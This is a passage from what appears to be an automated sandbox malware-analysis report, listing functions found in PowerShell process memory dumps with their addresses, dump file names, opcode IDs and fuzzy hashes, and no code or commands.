                                                                                                                                                                                    • Instruction Fuzzy Hash: FD31E121E1FA874FF7A9F72C28552797AD2EF416E8F5800BAD01DC31D3DE18AC088619
                                                                                                                                                                                    Function 00007FF848CF4195 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000000E.00000002.2363951768.00007FF848CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848CF0000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_14_2_7ff848cf0000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                    • Instruction ID: b01bc69e873dbe0df0819f2a2257684cd8befd660ef0f47ef0395d8608bf6ff0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 64998e6327d7109a0430388bedef7d144e8725d57d90dafb0120ff9002e4a4a8
                                                                                                                                                                                    • Instruction Fuzzy Hash: AA01677111CB0C4FD748EF4CE451AA5B7E0FB95364F10056DE58AC3695D736E881CB45

                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                    Function 00007FF848E506A5 Relevance: .5, Instructions: 508COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2480421991.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848e50000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f0e25e7813f9cbbc8dea388df76534343db52429f49ca7c2c25ead08572ed8f4
                                                                                                                                                                                    • Instruction ID: 38a5fe0641b6a0dfe1c663de90e2a7a6d6f49e9dbcaa3bc7e4028719536cbce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: f0e25e7813f9cbbc8dea388df76534343db52429f49ca7c2c25ead08572ed8f4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5AE1157290EAC94FE396BB7858556B4BFE0FF56650F0801FBE048C71A3DA299C068356
                                                                                                                                                                                    Function 00007FF848E53255 Relevance: .4, Instructions: 429COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2480421991.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848e50000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 90a1ab5e2a9eb127f0e244820080fd18e373e4574740f87abcd8b7f8df0e9f04
                                                                                                                                                                                    • Instruction ID: 5ef95b1ac634d42c14964c23bdc4f76e912c89ecfd3334323f898e253f729635
                                                                                                                                                                                    • Opcode Fuzzy Hash: 90a1ab5e2a9eb127f0e244820080fd18e373e4574740f87abcd8b7f8df0e9f04
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5CD15271D0EA8A5FE79AEBAC98155B5BBA0FF46394F4800FED00CC7193DB28A805C355
                                                                                                                                                                                    Function 00007FF848D84182 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2479747615.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: d257ff1e0bc88ebe34e995e4a09b8c6e76a9260aa6b4c2715b12841f28690f7c
                                                                                                                                                                                    • Instruction ID: 9c51fc77e51c3fb1578f1511380691b72e65041b62e7a624b6196da53a2afa74
                                                                                                                                                                                    • Opcode Fuzzy Hash: d257ff1e0bc88ebe34e995e4a09b8c6e76a9260aa6b4c2715b12841f28690f7c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 22017572F1CA194FD75CAA5C78422B873D2F798761F00027FE59EC3282DE255C57068A
                                                                                                                                                                                    Function 00007FF848D84196 Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2479747615.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 59f0af9f94d4f1d1723b765976fa67d94cd30363663517dccaba1bb5a63e89cb
                                                                                                                                                                                    • Instruction ID: b7c0dbdf9a68b0c4db069b484c233d895241e5d1e918104c702abd19faadc344
                                                                                                                                                                                    • Opcode Fuzzy Hash: 59f0af9f94d4f1d1723b765976fa67d94cd30363663517dccaba1bb5a63e89cb
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B017572F1CA194FD75CAA5C78462BD73D2F798661F01023FD19EC3282DE255C17068A
                                                                                                                                                                                    Function 00007FF848D841A7 Relevance: .1, Instructions: 68COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2479747615.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 44ecbe2f2627a85a6eded6cbc7219ce716ea840395b9317d573cd907390f4768
                                                                                                                                                                                    • Instruction ID: 364ca7c764a6de0de34d1d9b59c5ef2596f11f3f72b899cf0e660be8ae5232a3
                                                                                                                                                                                    • Opcode Fuzzy Hash: 44ecbe2f2627a85a6eded6cbc7219ce716ea840395b9317d573cd907390f4768
                                                                                                                                                                                    • Instruction Fuzzy Hash: B6017172F1CA194FD75CAA5C78422B8B3D2F798661F00023FE19EC3282DE259C13068A
                                                                                                                                                                                    Function 00007FF848E53462 Relevance: .1, Instructions: 60COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2480421991.00007FF848E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E50000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848e50000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 11afd0ddfc4d582634d53b38899ef6b9e787360fa50b2e8dc82ce1e9d039928e
                                                                                                                                                                                    • Instruction ID: d0aa6ab0958831893ebfb3b5b9e955a591a77e3e627526d3b499a47c01e67cf9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 11afd0ddfc4d582634d53b38899ef6b9e787360fa50b2e8dc82ce1e9d039928e
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2B11E371A0D6454FEBA6EA9CD095178F7A1FF46350F9400BEC00DC7182CB3958458354
                                                                                                                                                                                    Function 00007FF848D833B5 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000010.00000002.2479747615.00007FF848D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848D80000, based on PE: false
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_16_2_7ff848d80000_powershell.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                    • Instruction ID: 224165ec8f45dee36243f959deff86883391830e77b87c6cca6c96d1a77f018c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                                                                                                                                                                    • Instruction Fuzzy Hash: A301447111CB084FDB48EF0CE451AA5B7E0FB95364F10056DE58AC3695DB26E882CB45